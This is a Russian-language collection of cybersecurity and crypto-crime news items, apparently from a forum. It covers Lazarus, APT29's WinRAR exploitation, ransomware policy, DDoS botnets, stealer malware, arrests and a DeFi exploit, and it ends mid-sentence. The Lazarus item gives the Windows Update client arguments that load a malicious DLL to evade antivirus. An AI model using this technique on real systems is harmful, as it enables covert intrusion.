Прошлой весной Камперт возобновила усилия, когда стоимость биткоина превысила 50 тысяч долларов (21 миллион тенге). Ронда стала искать решение в интернете и наткнулась на Криса и Чарли Бруксов - отца и сына, которые взламывают криптокошельки за вознаграждение. Доверившись хакерам, женщина рассказала все детали, которые смогла вспомнить. Затем состоялся видеозвонок, во время которого Крис открыл кошелек Ронды, в нем было 3,5 биткоина, что тогда равнялось 175 тысячам долларов (около 75 миллионов тенге).
Как сообщается, Крис Брукс основал фирму Crypto Asset Recovery в 2017 году и подключил к проекту 20-летнего сына Чарли. Их сервис использует компьютеры для проверки сотен тысяч возможных комбинаций идентификаторов входа и паролей. Отец и сын устроили в своем доме в Нью-Гэмпшире серверный центр, предоставляя помощь тем, кто потерял доступ к кошельку. Как отмечают хакеры, лишь каждый третий случай становится успешным, хотя, по их словам, за прошлый год они восстановили биткоинов на семизначную сумму.
"Я отдала Крису и Чарли их 20 процентов, а затем сразу сняла 10 тысяч долларов, чтобы помочь дочери в колледже", - говорит Ронда.
Click to expand...
По ее словам, остальную часть она держит в аппаратном кошельке - так называется устройство, похожее на USB-накопитель, которое хранит данные в автономном режиме. Женщина надеется, что биткоин снова вырастет в цене и тогда она сможет больше не работать.
По оценкам платформы Chainanalysis, из 18,9 миллиона биткоинов, находящихся в обращении, 3,7 миллиона цифровых монет утеряны владельцами.
Ранее в Казахстане задержали подозреваемого в хищении биткоинов на сумму 130 миллионов тенге у жительницы Нур-Султана.
Lazarus Использует Центр обновления Windows для развертывания вредоносного кода на целевых объектах
Цель Lazarus — проникнуть в правительственные структуры США
Lazarus Group — киберпреступная группировка, которую связывают с
правительством Северной Кореи. Эксперты из Malwarebytes обнаружили, что
Lazarus взломала клиент Центра обновления Windows для распространения
вредоносного ПО.
Группировка выдавала себя за Lockheed Martin, американскую аэрокосмическую,
оборонную, информационную и технологическую корпорацию, с целью украсть как
можно больше разведывательных данных.
В фишинговой компании использовались документы Salary_Lockheed_Martin_job_opportunities_confidential.doc и Lockheed_Martin_JobOpportunities. docx c целью привлечь жертв перспективой трудоустройства в Lockheed Martin.
После открытия файла, макрокоманды Word использовали клиент «Центра обновления Windows» для установки вредоносных библиотек DLL, чтобы обойти большинство существующих систем безопасности, включая популярные антивирусы.
В результате атакующий может выполнить произвольный вредоносный код через клиент Microsoft Windows Update, передав следующие аргументы: /UpdateDeploymentProvider, путь к вредоносной dll и аргумент /RunHandlerComServer после dll.
В прошлом Lazarus уже проводила атаки, известные под кодовым названием «Работа мечты». Хакеры предлагали госслужащим перейти на работу в крупнейшие компании, тем временем воруя данные с их рабочих станций. Ранее кампания имела большой успех и позволила злоумышленникам проникнуть в сети десятков государственных организаций по всему миру.
В прошлом году Lazarus атаковала ИБ экспертов с помощью троянизированного приложения IDA Pro. Троян позволяет злоумышленникам получить доступ к устройству для кражи файлов, создания снимков экрана, регистрации.
Министерство юстиции активизирует меры по борьбе с программами-вымогателями и
киберпреступностью посредством арестов и других действий, сообщил Associated
Press его второй чиновник, поскольку администрация Байдена усиливает ответ на
то, что она считает неотложной угрозой экономической и национальной
безопасности.
Заместитель генерального прокурора Лиза Монако заявила, что «в ближайшие дни и
недели вы увидите больше арестов», больше конфискованных выкупов у хакеров и
дополнительных операций правоохранительных органов.
«Если вы приедете за нами, мы приедем за вами», - сказал Монако в интервью AP
на этой неделе. Она отказалась сообщить подробности того, кто, в частности,
может столкнуться с судебным преследованием.
Эти действия призваны развить шаги, предпринятые в последние месяцы, включая
недавнюю экстрадицию в США подозреваемого российского киберпреступника и
конфискацию в июне 2,3 миллиона долларов в криптовалюте, выплаченных хакерам.
Они происходят в то время, когда США продолжают терпеть то, что Монако назвало
«непрерывной барабанной дробью» атак, несмотря на увещевания президента Джо
Байдена, высказанные прошлым летом российскому коллеге Владимиру Путину после
серии прибыльных атак, связанных с базирующимися в России хакерскими бандами.
«Мы не заметили существенных изменений в ландшафте. Только время покажет, что
Россия может сделать на этом фронте », - заявили в Монако.
Но Монако добавило:«Мы не собираемся останавливаться. Мы собираемся
продолжать настаивать на том, чтобы привлечь к ответственности тех, кто
пытается преследовать наши отрасли, держать наши данные в заложниках и
угрожать национальной безопасности, экономической безопасности и личной
безопасности ».
Другой чиновник, Национальный кибердиректор Крис Инглис, нарисовал более
радужную картину, заявив законодателям в среду, что в США наблюдается
«заметное снижение» атак, исходящих из России, но еще слишком рано говорить,
почему.
Монако является давним звеном в правоохранительных органах Вашингтона: он
работал начальником штаба ФБР у тогдашнего директора Роберта Мюллера и главой
отдела национальной безопасности Министерства юстиции. Она была чиновником
Белого дома в 2014 году, когда министерство юстиции выдвинуло первое в своем
роде обвинение против хакеров китайского правительства.
Нынешнее положение Монако с надзором за ФБР и другими компонентами
Министерства юстиции сделало ее ключевым игроком в усилиях правительства США
по борьбе с рансомом. Эта борьба не поддается легким решениям, учитывая
огромное количество дорогостоящих атак и легкость, с которой хакеры проникают
как в частные компании, так и в государственные учреждения. Также неясно,
какое влияние окажет последний ответ правительства.
Хотя это и не новое явление, атаки рансома, при которых хакеры блокируют и
шифруют данные и требуют зачастую непомерные суммы, чтобы передать их жертвам,
за последний год резко возросли с нарушениями, затрагивающими жизненно важную
инфраструктуру и глобальные корпорации.
Компания Colonial Pipeline, которая поставляет примерно половину топлива,
потребляемого на Восточном побережье, выплатила более 4 миллионов долларов
после майской атаки, которая привела к остановке операций, хотя Министерство
юстиции забрало большую часть этой суммы обратно после установления
виртуального кошелька преступников. , известный как DarkSide. По словам
Монако, общественность должна ожидать большего количества таких изъятий.
JBS, крупнейший в мире переработчик мяса, заявила в июне, что заплатила 11
миллионов долларов после взлома российской группы, известной как REvil,
которая через несколько недель осуществила массовую атаку с использованием
рансома, которая обрушилась на компании по всему миру.
В результате громких атак программы-вымогатели стали неотложной задачей
национальной безопасности, в то время как администрация изо всех сил пыталась
сдержать натиск.
Внутри Министерства юстиции официальные лица в апреле сформировали целевую
группу по вымогательству из прокуроров и агентов, и они приказали прокуратуре
США сообщать о случаях вымогательства в Вашингтон, как если бы они делали
террористические атаки.
Он также пытался привлечь к ответственности, экстрадировав из Южной Кореи в
прошлом месяце обвиняемого в российском хакере Владимира Дунаева, который, по
утверждениям прокуратуры, участвовал в кибер-банде, чье вредоносное
программное обеспечение, известное как «Trickbot», заразило миллионы
компьютеров.
«В ближайшие дни и недели вы увидите больше действий, которые вы видели на
прошлой неделе», - заявило Монако.
Тем не менее, привлечь к ответственности иностранных хакеров в США, как известно, сложно, а банды вымогателей многочисленны. Даже если недавние атаки не вызвали такой же огласки, как атаки прошлой весной, Монако заявила, что не было заметных изменений в поведении оппортунистических хакеров, которые все еще нацеливаются на целый ряд отраслей с помощью атак, которыеугрожают парализовать важные бизнес-операции или вынудить многомиллионные выплаты.
Монако заявила, что с пониманием относится к трудным решениям, которые должны
принимать компании, отчасти потому, что у нее есть опыт противодействия
денежным требованиям преступников.
Как советник по национальной безопасности и борьбе с терроризмом в
администрации Обамы, она помогла разработать новую политику в отношении
американцев, находящихся в заложниках за границей. Политика повторяла, что
выплата выкупа за заложников не поощрялась и была незаконной, но также ясно
давала понять, что прокуратура не планировала предъявлять уголовные обвинения
семьям, которые производили такие выплаты.
«Это отражает и, откровенно говоря, то, что отразили все усилия, - это
ощущение со стороны Лизы, что это была область, в которой вам нужен был
исключительный баланс между политикой и человечностью», - сказал Джошуа
Гельцер, заместитель советника по внутренней безопасности администратора
Байдена, который работал с Монако в Белом доме Обамы.
Правительство США публично не одобряет выплаты программ-вымогателей, но
Монако, которое во время правления Обамы столкнулось с критикой со стороны
семей заложников по поводу реакции правительства на их тяжелое положение,
заявляет, что администрация пытается прислушиваться к мнению пострадавших
компаний и работать с ними.
Официальные лица не проявили интереса к судебному преследованию компаний,
которые платят выкуп хакерам, хотя в прошлом месяце Монако объявило, что
департамент готов подать в суд на федеральных подрядчиков, которые не
раскрывают, что они были взломаны или не соответствуют стандартам
кибербезопасности.
«У нас есть опыт, когда компании не уделяют должного внимания на этом фронте»,
Скорее всего, надоедая новым интерфейсом приложений по умолчанию для Windows
11, Mozilla обошла политики Microsoft, чтобы пользователям было проще
переключать браузер по умолчанию.
Раньше, когда приложение Windows хотело стать программой по умолчанию, оно
вносило изменения программно, изменяя реестр.
После того, как некоторые программы начали без разрешения перехватывать
настройки программы по умолчанию, Microsoft добавила ограничения в Windows 10,
потребовав от пользователей специально выбирать свои программы по умолчанию.
Начиная с Windows 10, когда приложение хотело стать программой по умолчанию, требовалось программно запустить экран настроек приложений по умолчанию и предложить пользователю выбрать приложение, которое они хотели бы использовать, как показано ниже.
Если программа захватила записи реестра без использования этого интерфейса,
Windows 10 сбросит настройки до значений по умолчанию и выдаст предупреждение.
**
Windows 11 превращает программы по умолчанию в беспорядок**
К сожалению, все это изменилось в Windows 11, поскольку Microsoft представила
новый и запутанный интерфейс для настроек приложений по умолчанию, которые
теперь требуют, чтобы вы вручную изменили программу по умолчанию для каждого
протокола и типа файла.
Например, если вы хотите изменить браузер по умолчанию, это не так просто, как
просто щелкнуть настройку «Веб-браузер» и выбрать браузер по вашему выбору.
Вместо этого теперь вам нужно искать каждое расширение файла (.html и .htm) и
протокол (HTTP или HTTPS) и вручную связывать их с программой, которую вы
хотите использовать, как показано ниже.
Вместо того, чтобы заставлять своих пользователей пробираться через серию
надоедливых настроек Windows 11, Mozilla переработала процесс настройки
Windows 11 по умолчанию, чтобы позволить пользователям сделать Firefox
браузером по умолчанию одним щелчком мыши.
Как впервые сообщает The Verge, начиная с Firefox 91, когда пользователь
нажимает кнопку «Сделать по умолчанию», браузер автоматически становится
браузером по умолчанию, не открывая экран настроек «Приложения по умолчанию» в
Windows 10 или Windows 11, как показано ниже.
[Firefox теперь программно меняет браузер по умолчанию](https://www.bleepstatic.com/images/news/web- browsers/firefox/91/windows-11-default-programs/Windows-11-firefox-change- default-browser.gif)
«Люди должны иметь возможность просто и легко устанавливать значения по
умолчанию, но они этого не делают», - сказал The Verge представитель Mozilla.
«Все операционные системы должны предлагать официальную поддержку разработчика
для статуса по умолчанию, чтобы люди могли легко установить свои приложения по
умолчанию. Поскольку этого не произошло в Windows 10 и 11, Firefox полагается
на другие аспекты среды Windows, чтобы предоставить людям возможности,
аналогичные тому, что Windows предоставляет Edge, когда пользователи выбирают
Firefox в качестве браузера по умолчанию ».
С этим новым изменением Mozilla Firefox по-прежнему оставляет пользователям
контроль над своим браузером по умолчанию, но позволяет им гораздо проще
переключаться на Firefox, если они захотят.
Поскольку Mozilla Firefox имеет открытый исходный код, другие разработчики
браузеров могут анализировать изменения и внедрять их в свои браузеры.
BleepingComputer обратился в Microsoft с вопросами об этом обходе, но в
настоящее время не получил ответа.
Источник: https://www.bleepingcomputer[.]com/...s-windows-11s-messy-default- browser-settings/
Известный ИБ-эксперт, журналист и автор блога KrebsOnSecurity Брайан Кребс сообщил, что в конце прошлой недели его сайт стал мишенью ботнета Mēris.
Об этом ботнете недавно детально рассказали специалисты «Яндекса» и Qrator Labs. Именно он ответственен за мощнейшие DDoS-атаки последнего времени, пиковая мощность которых составляла 17,2 и 21,8 млн запросов в секунду, что является новым рекордом. К примеру, в последнее время Mēris атаковал «Яндекс», одного из клиентов Cloudflare, а также стоял за DDoS-атаками в Новой Зеландии, из-за которых в стране местами перестал работать интернет, возникли проблемы у банков, почтовых отделений и так далее.
Ботнету дали имя Mēris – «чума» по-латышски, так как считается, что в основном он состоит из устройств латвийской компании Mikrotik.
Кребс пишет, что в минувший четверг KrebsOnSecurity тоже подвергся DDoS-атаке, хотя и не такой мощной, как «Яндекс» в августе-сентябре 2021 года. При этом атака в четыре раза превосходила DDoS-атаку Mirai, от которой ресурс пострадал в 2016 году и отключился почти четыре дня.
Кребс говорит, что на этот раз речь шла о 2 млн запросах в секунду (для сравнения, DDoS-атака Mirai насчитывала примерно 450 000 запросов в секунду).
Исследователь резюмирует, что Mēris вполне способен стать новой головной болью для ИБ-специалистов, подхватив эстафету малвари Mirai, которой скоро исполнится уже пять лет, однако и она до сих пор активна и используется для строительства ботнетов.
Источник: https://xakep.ru/2021/09/13/meris-krebsonsecurity/
Комиссар Гамбурга по защите данных и свободы информации Йоханнес Каспар ввел экстренный запрет на сбор данных на три месяца.
Регулятор в Гeрмании запретил Facebook собирать данные немецких пользователей WhatsApp. Об этом сообщает Forbes со ссылкой на Bloomberg. Ведомство назвало незаконной попытку компании заставить пользователей согласиться с обновленными условиями использования приложения.
Комиссар Гамбурга по защите данных и свободы информации Йоханнес Каспар ввел экстренный запрет на сбoр данных на три месяца, уточняет агентство. Он также попросил регуляторов других стран Евросоюза принять аналогичные меры. Каспар уверен, что новые условия WhatsApp непрозрачны, противоречивы и чрезмерно масштабны.
Приказ наносит удар по бизнес-модели и рeкламной стратегии Facebook. Представитель WhatsApp назвал претензии Каспара «ошибочными» и заявил, что приказ не остановит внедрение новой политики. Действия регулирующего органа «основаны на фундаментальном непонимании» целей и эффекта oбновления, заявил мессенджер.
По словам Каспара, американский технологический гигант, возможно, уже незаконно обрабатывает данные пользователей. Он также отметил, что предотвратить неправомерное использование данных особенно важно перед выборами, которые состоятся в Германии в сентябре.
Как сообщалось ранее, в WhatsApp объявили о введении новых правил в январе этого года. Изначально предполагалось применить новые правила использования мессенджера уже 8 февраля, но из-за широкого общественного резонанса руководство WhatsApp перенесло введение новой политики конфиденциальности данных на 15 мая.
В рамках февральского «вторника обновлений» компания Microsoft исправила 56 различных багов в своих продуктах, а также предупредила о трех опасных уязвимостях в Windows-стеке TCP/IP.
Среди исправленных ошибок была одна уязвимость нулевого дня (получившая идентификатор CVE-2021-1732), уже находившаяся под атаками. Проблему классифицировали как повышение привилегий в Win32k.
Согласно отчету китайской компании DBAPPSecurity, этот 0-day использовался группировкой Bitter, которая имеет длинный «послужной список» из атак, направленных на организации и пользователей в Пакистане и Китае. Эксперты отмечают, что злоумышленники использовали эксплоит «с осторожностью» и оставались незамеченным почти семи месяцев.
По данным исследователей, эксплоит для CVE-2021-1732 был скомпилирован еще в мае 2020 года и разрабатывался под 64-битную Windows 10 1909, хотя последующие тесты показали, что уязвимость представляет угрозу и для 64-битной Windows 10 20H2.
Также этот «вторник обновлений» содержит ряд исправлений для уязвимостей, информация о которых уже была опубликована ранее, однако их не использовали хакеры. В их числе:
Кроме того, разработчики Microsoft выпустили исправления для трех критических уязвимостей в Windows-стеке TCP/IP и теперь призывают всех установить патчи как можно скорее.
Две из трех уязвимостей ([CVE-2021-24074](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-24074) и [CVE-2021-24094](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-24094)) могут использоваться для удаленного выполнения произвольного кода. То есть с их помощью злоумышленники могут удаленно захватить Windows-системы. Третья и последняя ошибка ([CVE-2021-24086](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-24086)) может спровоцировать отказ в обслуживании (DoS).
«Обе RCE-уязвимости являются сложными, что затрудняет создание функциональных эксплоитов. Поэтому они вряд ли будут использоваться в ближайшее время, — [пишут](https://msrc- blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/) аналитики Microsoft. —Мы полагаем, что злоумышленники смогут создать эксплоиты DoS-уязвимости намного быстрее, и ожидаем, что все три проблемы могут быть использованы для DoS-атак совсем скоро».
Click to expand...
Источник: xakep.ru/2021/02/10/feb-patch-tuesday-2/
Двоих мужчин задержали сотрудники Управления по борьбе с противоправным использованием информационно-коммуникационных технологий ГУ МВД России по Челябинской области и ОМВД России по Еманжелинскому району.
Как рассказали в пресс-службе областного полицейского Главка, два челябинца взламывали личные кабинеты на портале «Госуслуги», а после этого от имени их владельцев брали кредиты и микрозаймы. Все полученные деньги, кибермошенники, естественно, переводили на свои счета.
Челябинцев задержали. Правоохранительные органы обыскали их дома и помещения, где мужчины непосредственно «работали». Там нашли сим-карты, банковские карты, мобильные телефоны, компьютеры, а также вещи, которые задержанные купили на похищенные деньги. Также изъяли машину, которую мужчины могли использовать для своих преступлений.
В настоящее время полицейские продолжают расследование уголовного дела, выявляют пострадавших. При этом в ведомстве уточнили, что не исключается, что жертвами мошенников могли стать не только южноуральцы, но и жители других регионов.
В Москве правоохранительные органы задержали более десяти клиентов криптовалютной биржи Bybit, которые проводили P2P-сделки на платформе и случайно стали контрагентами похитителей денег у монастыря. Об этом сообщает юридическое агентство Cartesius.
По их информации, ситуация связана с хищением 26,4 млн рублей со счетов Марфо- Мариинской обители милосердия в начале мая. Представители самого монастыря заявили, что одна из сотрудниц стала жертвой мошенничества.
Деньги вывели через множество счетов по всей РФ. В частности, с 1 по 7 мая они переводились со счетов Райффайзен Банка на биржу Bybit.
Юристы просят всех клиентов торговой платформы, которые в этот период получали на карты средства от пользователя по имени Анисимов А.О., либо с карты отправителя Максима Сергеевича Крафта, связаться с ними в Telegram. При этом они не исключили, что диапазон задействованных банков и криптобирж может быть шире.
«Вместо того, чтобы сделать на биржу запросы, выяснить, с кем они работали, и задать вопросы этим людям, получателей денег просто всех подряд отправляют в тюрьму, причем неважно, дропов или самих трейдеров», — прокомментировали в Cartesius.
Сейчас команда юристов собирает информацию по уже задержанным трейдерам.
life.ru/p/1658344/amp
t.me/LexagencyLawStream/1067
t.me/obitelmiloserdia/5445
Компания PayPal патентует новый метод, позволяющий обнаружить кражу супер- cookie, что может улучшить механизм аутентификации на основе cookie и предотвратить атаки с целью захвата аккаунтов.
Проблема, с которой борется PayPal, заключается в том, что хакеры регулярно похищают файлы cookie, содержащие токены аутентификации, чтобы входить в учетные записи жертв без использования учетных данных и обходить двухфакторную аутентификацию (2ФА).
«Кража файлов cookie — это сложная форма кибератаки, при которой злоумышленник крадет или копирует файлы cookie с компьютера жертвы, — гласит патентная заявка PayPal. — Украденные файлы cookie часто содержат хешированные пароли, и злоумышленник может использовать веб-браузер на своем компьютере, чтобы выдать себя за пользователя (или его аутентифицированное устройство) и получить доступ к защищенной информации, связанной с учетной записью пользователя, без необходимости вручную входить в систему или предоставлять учетные данные для аутентификации».
Click to expand...
Как объясняет издание Bleeping Computer, в отличие от стандартных файлов cookie, хранящихся локально, так называемые супер-cookie (они же flash cookie) представляют собой Local Shared Objects (LSO), которые внедряются на сетевом уровне в виде UIDH интернет-провайдером пользователя.
Эти супер-cookie используются в основном для межсайтового отслеживания, отслеживания пользователей в разных браузерах на одном устройстве, сбора данных о просмотрах и для фингерпринтинга устройств. Их сложнее обнаружить и удалить, поскольку они хранятся не в стандартном месте для хранения cookie.
Согласно патентной заявке, инженеры PayPal разработали метод расчета коэффициента риска мошенничества в механизме аутентификации на основе файлов cookie для выявления мошеннических попыток входа в систему. Так, когда система получает запрос на аутентификацию с устройства пользователя, она обнаруживает все места хранения файлов cookie на устройстве и сортирует их «в порядке возрастания риска мошенничества».
[](https://xakep.ru/wp- content/uploads/2024/02/452507/logic.jpg)
Для обеспечения защиты от несанкционированного доступа полученные значения cookie шифруются с помощью криптографического алгоритма с публичным ключом.
«С устройства извлекаются значения cookie из каждого места хранения. Для каждого места хранения после первого ожидаемое значение cookie рассчитывается на основе значения cookie предыдущего места хранения», — объясняют в PayPal.
Click to expand...
Затем система оценивает степень риска, сравнивая ожидаемые значения cookie со значениями, присвоенными различным местам хранения на устройстве.
«Запрос на аутентификацию обрабатывается в зависимости от того, превышает ли присвоенный балл хотя бы для одного из мест хранения заранее установленный допустимый коэффициент риска мошенничества», — сообщается в документе.
Click to expand...
[](https://xakep.ru/wp- content/uploads/2024/02/452507/encryption.jpg)
Разумеется, как и в случае с другими патентами, нет никаких гарантий, что описанные в документе методы в итоге будут применяться в реальности. Однако заявка на патент подчеркивает, что кража веб cookie является достаточно серьезной проблемой, для борьбы с которой могут потребоваться новые механизмы защиты.
После Sandworm и APT28 (известного как Fancy Bear), другая спонсируемая государством российская хакерская группа, APT29, использует уязвимость CVE-2023-38831 в WinRAR для кибератак.
APT29 отслеживается под разными именами (UNC3524,/NobleBaron/Dark Halo/NOBELIUM/Cozy Bear/CozyDuke, SolarStorm) и нацелен на посольства с помощью приманки для продажи автомобилей BMW.
Уязвимость безопасности CVE-2023-38831 затрагивает версии WinRAR до 6.23 и позволяет создавать архивы .RAR и .ZIP, которые могут выполняться в фоновом коде, подготовленном злоумышленником для вредоносных целей.
Уязвимость использовалась как нулевой день с апреля злоумышленниками, нацеленными на форумы по торговле криптовалютами и акциями.
Статический домен Ngrok для связи прикрытия
В отчете на этой неделе Совет национальной безопасности и обороны Украины (NDSC) сообщает, что APT29 использует вредоносный ZIP-архив, который в фоновом режиме запускает сценарий, чтобы показать PDF-приманку и загрузить код PowerShell, который загружает и выполняет полезную нагрузку.
Вредоносный архив называется «DIPLOMATIC-CAR-FOR-SALE-BMW.pdf» и нацелен на
несколько стран европейского континента, включая Азербайджан, Грецию, Румынию
и Италию.

APT29 уже использовал фишинговую приманку с рекламой автомобилей BMW для нападения на дипломатов в Украине во время майской кампании по доставке полезных данных ISO с помощью техники контрабанды HTML.
Украинский NDSC утверждает, что в этих атаках APT29 объединил старую тактику фишинга с новой техникой, обеспечивающей связь с вредоносным сервером.
NDSC сообщает, что российские хакеры использовали бесплатный статический домен Ngrok (новая функция, о которой Ngrok объявила 16 августа) для доступа к серверу управления и контроля (C2), размещенному на их экземпляре Ngrok.
Используя этот метод, злоумышленникам удалось скрыть свою активность и связаться со скомпрометированными системами, не подвергаясь риску быть обнаруженными.
Поскольку исследователи из компании Group-IB, занимающейся кибербезопасностью, сообщили, что уязвимость CVE-2023-38831 в WinRAR использовалась как нулевой день, продвинутые злоумышленники начали включать ее в свои атаки.
Исследователи безопасности из ESET обнаружили в августе атаки, приписываемые
российской хакерской группе APT28, которая использовала уязвимость в целевой
фишинговой кампании, нацеленной на политические субъекты в ЕС и Украине,
используя повестку дня Европейского парламента в качестве приманки.
В октябрьском отчете Google отмечается, что проблема безопасности была использована российскими и китайскими государственными хакерами для кражи учетных данных и других конфиденциальных данных, а также для обеспечения устойчивости целевых систем.
Украинский NDSC заявляет, что наблюдаемая кампания APT29 выделяется тем, что она сочетает в себе старые и новые методы, такие как использование уязвимости WinRAR для доставки полезных данных и сервисов Ngrok для сокрытия связи с C2.
В отчете украинского агентства представлен набор индикаторов компрометации (IoC), состоящий из имен файлов и соответствующих хешей для сценариев PowerShell и файла электронной почты, а также доменов и адресов электронной почты.
Кардер из американской Атланты (штат Джорджия) был приговорен к четырем годам заключения в федеральной тюрьме за кражу полумиллиона долларов со счета женщины из соседнего округа. 38-летний Марквалдис Антвон Логан (Marqualdis Antwon Logan) также будет вынужден возместить значительную часть украденных денег.
В сентябре 2020 года жительница округа Колумбия заметила подозрительное движение средств на своих счетах. Привлеченные к расследованию сотрудники ФБР выяснили, что мошеннический аккаунт каким-то образом получил доступ к счету, после чего принялся обналичивать и переводить онлайн-чеки на другие банковские счета. Раскрутка этих счетов и вывела силовиков на Логана, который был арестован лишь спустя два года во время поездки на Виргинские острова.
Логан заключил сделку со следствием и признал себя виновным не только по восьми пунктам обвинения в банковском мошенничестве, но и в более раннем преступлении. Со счета другой жертвы кардер вывел около 100 тысяч долларов, получив доступ с помощью документов умершего супруга женщины. Кроме того, американец успел пополнить свой счет на 20 тысяч долларов благодаря ковидным пособиям.
source: news.yahoo.com/man-sentenced-federal-prison-stealing-163746759.html
Пользователь под псевдонимом Res, назвавший себя белым хакером, заявил, что раскрыл трюк команды проекта El Dorado Exchange, позволяющий ликвидировать любую позицию.
Хакер сообщил в Твиттере, что обнаружил бэкдор и сумел вывести с биржи El Dorado Exchange (EDE) на Arbitrum активы на сумму около $580 000 при минимальных вложениях в пул ликвидности ELP-1. По словам Res, разработчики EDE внедрили бэкдор, который позволял им ликвидировать любую позицию по своему желанию, а также указывать недостоверные цены криптоактивов с целью манипулирования позициями и кражи средств пользователей.
New message says:
"ede admins created a bot to force liqudate any position of their choice when ever they like. ask the admins about it, see if they lie to you."https://t.co/chZG714BZ7 https://t.co/89EdZ39ejK — Res (@resdegen) May 29, 2023
Click to expand...
Res заявил, что если разработчики признают факт манипулирования ценами, то он вернет активы обратно за вычетом комиссии в размере 10%. По данным СМИ, официальные лица EDE пока не дали никакого ответа. Однако, со ссылкой на анонимные источники сообщается, что команда биржи признала факт возможности манипулирования ценами, но с благой целью — внести потенциальных хакеров в черный список и защитить активы пользователей.
Датская полиция арестовала шестерых мужчин, которые занимались торрент- сайтами. У них изъяли компьютеры и другое оборудование, а также деньги, полученные от незаконной деятельности.
Среди торрент-сайтов были ShareUniversity и DanishBytes. Последний был основан в январе 2021 года. Полиция провела обыски в домах шести мужчин. Им было от 22 до 41 года. Все были арестованы по подозрению в серьёзном нарушении авторских прав и будут освобождены после допроса. Полиция изъяла у них $46 700. Эти деньги, скорее всего, были прибылью с пиратской деятельности.
Сообщается, что один из арестованных продал доступ к серверам, которые использовались большим количеством пользователей для обмена примерно 3800 файлами, защищёнными авторскими правами.
Агентство национальной безопасности и Агентство по кибербезопасности и
безопасности
инфраструктуры США [выпустили](https://www.nsa.gov/Press-Room/News-
Highlights/Article/Article/2791320/nsa-cisa-release-guidance-on-selecting-and-
hardening-remote-access-vpns/) руководство с советами и практическими
решениями для
усиления безопасности при работе с виртуальными частными сетями.
Организации представили
[документ](https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-
HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF) для помощи улучшения защиты частных
и государственных
компаний. В брошюре рекомендуется ответственно подходить к выбору VPN-сервисов
и уделять
должное внимание сохранению конфиденциальности учетных данных. Также, согласно
опубликованному документу, следует выбирать поставщиков услуг по работе с
виртуальными
частными сетями, имеющих опыт быстрой борьбы с рядом известных уязвимостей.
АНБ напоминает о существовании потенциальной опасности кибератак со стороны государств, которые ранее были уличены в использовании уязвимостей VPN для кражи персональных данных, перехвата трафика и получения доступа к хранилищам устройств.
Агентства разработали советы для работы с VPN на фоне возросшего количества атак с использованием уязвимостей в работе виртуальных частных сетей. Так в апреле 2021 года компания FireEye [опубликовала](https://www.fireeye.com/blog/threat-research/2021/04/suspected- apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html) исследование, согласно которому, две хакерские группировки атаковали министерство обороны США, использовав 0-day уязвимость в VPN-сервисе Pulse Connect Secure.
Источник - https://habr.com/ru/news/t/581040/
Злоумышленникам удалось получить доступ к конфиденциальной информации пользователей, в том числе к их именам, идентификационным номерам (ID), адресам электронной почты, дате рождения и номерам мобильных телефонов. Пароли пользователей необратимо зашифрованы с помощью алгоритма PBKDF2, поэтому их украсть не смогли.
BtcTurk подтвердила утечку данных о 516 954 пользователях, которые зарегистрировались на площадке до июля 2018 года. Технические специалисты BtcTurk сообщили, что не обнаружили никаких нарушений в системе безопасности. Сотрудники биржи отрицают наличие кибератак, в ходе которых данные могли «слиться». BtcTurk заверила пользователей, что их средства находятся в безопасности, поэтому они могут безопасно проводить операции на платформе. BtcTurk также сообщила, что злоумышленники не смогли получить доступ к информации о балансе пользователей и их банковским счетам. Биржа уже начала взаимодействовать с потенциальными жертвами утечки информации.
«Утечка произошла из-за нарушения безопасности носителя данных. Это может быть связано с необработанной информацией, извлеченной из нашей базы данных, которую мы собирались передать одному из наших партнеров на законных основаниях», - предположили специалисты по безопасности BtcTurk.
Клиентам биржи рекомендуется сменить пароли, обновить данные двухфакторной аутентификации и не передавать эту информацию третьим лицам. Чтобы не стать жертвой фишинговых атак, не стоит переходить по подозрительным ссылкам.
Сtrl c + Сtrl v
https://www.anti-malware.ru/news/2021-05-06-1447/35775
Киберпреступники, заразившие ряд пользователей вредоносной программой, а также похитившие их пароли и другие персональные данные, не смогли должным образом защитить свои бэкенд-серверы. В результате это привело к утечке конфиденциальной информации жертв злонамеренной киберкампании. Проблемный сервер обнаружил специалист Security Discovery Боб Дьяченко, он же долгое время пытался убедить провайдера вывести этот сервер в офлайн. Оказалось, что незащищённое хранилище сливало не только пароли пользователей, но и файлы cookies, используемые для аутентификации. Проблема заключалась в том, что Elasticsearch-сервер стоял просто без пароля, благодаря чему любой желающий мог получить доступ к конфиденциальной информации жертв вредоносной программы.
Судя по всему, вышеупомянутый сервер выступал в качестве командного центра для ворующего информацию зловреда RaccoonStealer. Специалисты в области кибербезопасности даже назвали конкретную версию вредоносной программы — 1.7.2. «RaccoonStealer распространяется по модели «вредонос как слуга» (Malware-as-a-Service). Аренда зловреда обходится злоумышленникам в 75-200 долларов в месяц. RaccoonStealer может похищать пароли, данные платёжных карт, криптовалютные кошельки и информацию из браузера», — объясняет Джемс Мод из BeyondTrust.
На скриншоте ниже можно посмотреть, как выглядела выгрузка из базы:
Злоумышленник атаковал работающий в сети Binance Smart Chain (BSC) проект децентрализованного финансирования Spartan Protocol и вывел из его пулов ликвидности около $30 млн.
По данным команды протокола, хакер использовал для атаки $61 млн в токенах BNB.
В Spartan также сообщили, что пытаются вернуть выведенные средства и обратились за помощью к Binance.
Аналитики компании PeckShield раскрыли механизм атаки, обнаружив, что злоумышленник использовал уязвимость в определении протоколом доли ликвидности. Хакер увеличивал баланс пула перед сжиганием в нем токенов, чтобы вывести избыточное количество базовых активов.
Для атаки он взял мгновенный займ на протоколе PancakeSwap в размере 100 000 BNB, который после вернул, заплатив комиссию в размере 260 BNB.
Согласно CoinGecko, цена токена Spartan Protocol (SPARTA), достигавшая 1 мая отметки $1,71, в моменте падала до $1. На момент написания котировки находятся около $1,15.
Эксперты Check Point сообщают, что хакеры «отметили» День святого Валентина с размахом. Аналитики компании еженедельно фиксировали более 400 фишинговых кампаний, посвященных празднику. При этом число новых доменов, выросло на 29% по сравнению с прошлым годом и достигло 23 000. Около 2,3% из них (523) оказались вредоносными или подозрительными.
Прирост
доменов
Традиционно февраль — это месяц покупок ко Дню святого Валентина, а в текущих
